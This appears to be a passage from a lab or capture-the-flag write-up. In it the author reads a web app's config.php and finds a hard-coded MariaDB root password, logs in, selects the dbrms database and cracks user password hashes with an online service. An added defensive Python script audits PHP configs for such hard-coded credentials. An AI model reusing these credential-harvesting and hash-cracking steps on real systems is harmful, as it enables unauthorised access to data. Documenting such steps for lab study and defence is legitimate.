MySQL
There is an internal MySQL instance running on the target, on port 3306
bash-4.2$ pwd
/var/www/html/rms
bash-4.2$ cd connection ; ll
total 8.0K
0 drwxr-xr-x. 2 root root 24 Jul 26 2021 .
4.0K drwxr-xr-x. 10 root root 4.0K Jul 26 2021 ..
4.0K -rw-r--r--. 1 root root 239 Jul 26 2021 config.php
bash-4.2$ cat config.php
<?php
define('DB_HOST', 'localhost');
define('DB_USER', 'root');
define('DB_PASSWORD', 'veerUffIrangUfcubyig');
define('DB_DATABASE', 'dbrms');
define('APP_NAME', 'Pathfinder Hotel');
error_reporting(1);
?>
The DB credential is hard-coded in the connection/config.php file; root:veerUffIrangUfcubyig
This was also picked up by PEAS
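Added example, not part of the original notes: a defender-side audit in Python that flags the three conditions visible in connection/config.php above (a literal DB_PASSWORD, a world-readable file mode, and DB_USER set to root). The function names and the sample tree are assumptions constructed for illustration, and the password in the sample is a placeholder.

```python
import re
import stat
import tempfile
from pathlib import Path

# Matches PHP constants of the form define('DB_USER', 'value');
DEFINE_RE = re.compile(r"""define\(\s*['"](DB_[A-Z_]+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")


def audit_config(path):
    """Return a list of findings for one PHP config file."""
    consts = dict(DEFINE_RE.findall(path.read_text(errors="replace")))
    findings = []
    if consts.get("DB_PASSWORD"):
        findings.append("hard-coded DB_PASSWORD literal")
        # Other-read bit set (e.g. 0644): any local account can read it.
        if path.stat().st_mode & stat.S_IROTH:
            findings.append("file is world-readable")
    if consts.get("DB_USER") == "root":
        findings.append("application connects as the database root user")
    return findings


def audit_tree(web_root):
    """Map each flagged .php file under web_root to its findings."""
    report = {}
    for path in sorted(Path(web_root).rglob("*.php")):
        found = audit_config(path)
        if found:
            report[path.relative_to(web_root).as_posix()] = found
    return report


def demo():
    """Audit a constructed sample tree; the password is a placeholder."""
    sample = ("<?php\ndefine('DB_HOST', 'localhost');\n"
              "define('DB_USER', 'root');\n"
              "define('DB_PASSWORD', 'EXAMPLE-PLACEHOLDER');\n?>\n")
    with tempfile.TemporaryDirectory() as root:
        cfg = Path(root, "connection", "config.php")
        cfg.parent.mkdir()
        cfg.write_text(sample)
        cfg.chmod(0o644)  # same mode as the listing above
        return audit_tree(root)


if __name__ == "__main__":
    for name, found in demo().items():
        print(name, "->", "; ".join(found))
```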
MariaDB
bash-4.2$ mysql -uroot -pveerUffIrangUfcubyig
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 3289
Server version: 5.5.68-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dbrms |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.02 sec)
MariaDB [(none)]> use dbrms
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
Successfully authenticated
Selecting the dbrms database
I will grab the user credential hashes
Password Cracking
crackstation.net cracked the password hashes, except for the one belonging to the edward user
This appears to be a dead end